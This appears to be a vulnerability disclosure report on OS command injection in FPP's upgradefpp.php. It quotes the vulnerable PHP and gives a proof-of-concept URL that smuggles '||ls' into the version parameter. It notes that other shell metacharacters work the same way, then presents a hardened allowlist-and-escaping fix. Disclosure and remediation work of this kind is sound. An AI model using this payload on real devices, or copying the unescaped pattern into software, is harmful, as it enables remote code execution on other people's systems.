OS Command Injection in FalconChristmas/fpp

Valid
Reported on May 29th 2021

✍️ Description

The `version` request parameter is concatenated, unvalidated and unquoted, into an OS command that is executed with `system()` in https://github.com/FalconChristmas/fpp/blob/123cdf2eb11062766da333a7a4d85bc0bf620e47/www/upgradefpp.php#L54

    // attacker-controlled value taken straight from the query string
    $version = $_GET['version'];
/**/
    // concatenated into the command line with no validation or escapeshellarg()
    $command = "sudo /opt/fpp/scripts/upgrade_FPP " . $version . " 2>&1";

    echo "Command: $command\n";
    echo "----------------------------------------------------------------------------------\n";
    // executed through the system shell, so shell metacharacters in $version are interpreted
    system($command);

🕵️‍♂️ Proof of Concept

Visit http://127.0.0.1/upgradefpp.php?version=||ls

The page then runs `sudo /opt/fpp/scripts/upgrade_FPP ||ls 2>&1`: the shell treats `||ls` as a second command, executes `ls` when the upgrade script exits non-zero, and the page echoes the output back because of the `2>&1` redirection and `system()`. Any other shell metacharacter (`;`, `&`, `$(...)`, backticks, a newline) works the same way; depending on the client the `||` may need to be sent URL-encoded as `%7C%7C`.
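For contrast, here is a hardened version of the command construction. This is an added example written for this report, not code from the FPP project: the function name and the allowlist regex are assumptions (FPP upgrade targets are assumed to look like git tags or branch names such as `v5.0` or `master`), so adjust the pattern to whatever `upgrade_FPP` actually accepts.

```php
<?php
// Added example, not FPP's own code. Builds the upgrade command safely:
// 1. reject anything that is not a plausible version/branch string (allowlist), and
// 2. pass even the accepted value as a single quoted shell word via escapeshellarg().
function build_upgrade_command(string $version): string
{
    // Assumed allowlist: first character alphanumeric (so the value cannot be parsed as
    // an option like "-rf" by upgrade_FPP), then up to 63 of [A-Za-z0-9._-].
    // Note the \z anchor: in PCRE, "$" also matches before a trailing newline, so
    // "v5.0\n" would slip through a pattern ending in "$".
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,63}\z/', $version)) {
        throw new InvalidArgumentException('invalid version string');
    }
    // Belt and braces: the shell now sees one quoted argument, never a second command.
    return 'sudo /opt/fpp/scripts/upgrade_FPP ' . escapeshellarg($version) . ' 2>&1';
}

// Constructed inputs for demonstration; the last four are injection attempts.
$inputs = ['v5.0', 'master', '||ls', "v5.0\n", '$(id)', '-rf'];
foreach ($inputs as $v) {
    try {
        echo json_encode($v), ' => ', build_upgrade_command($v), "\n";
    } catch (InvalidArgumentException $e) {
        echo json_encode($v), ' => rejected: ', $e->getMessage(), "\n";
    }
}
```

With this in place the PoC value `||ls` is rejected before any shell is involved, and a value that somehow passed the allowlist would still reach `upgrade_FPP` as a single quoted argument rather than as additional shell syntax. The allowlist is the primary control; `escapeshellarg()` on its own would also neutralise `||ls`, but it does not stop a caller from handing `upgrade_FPP` an unexpected argument such as an option flag.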

💥 Impact

Remote code execution: any user who can reach `upgradefpp.php` can run arbitrary shell commands on the device as the web server user, with the command output returned in the HTTP response. Because this page already relies on `sudo` to run the upgrade script, any further passwordless sudo rights granted to that user would let the injected command be prefixed with `sudo` and run as root.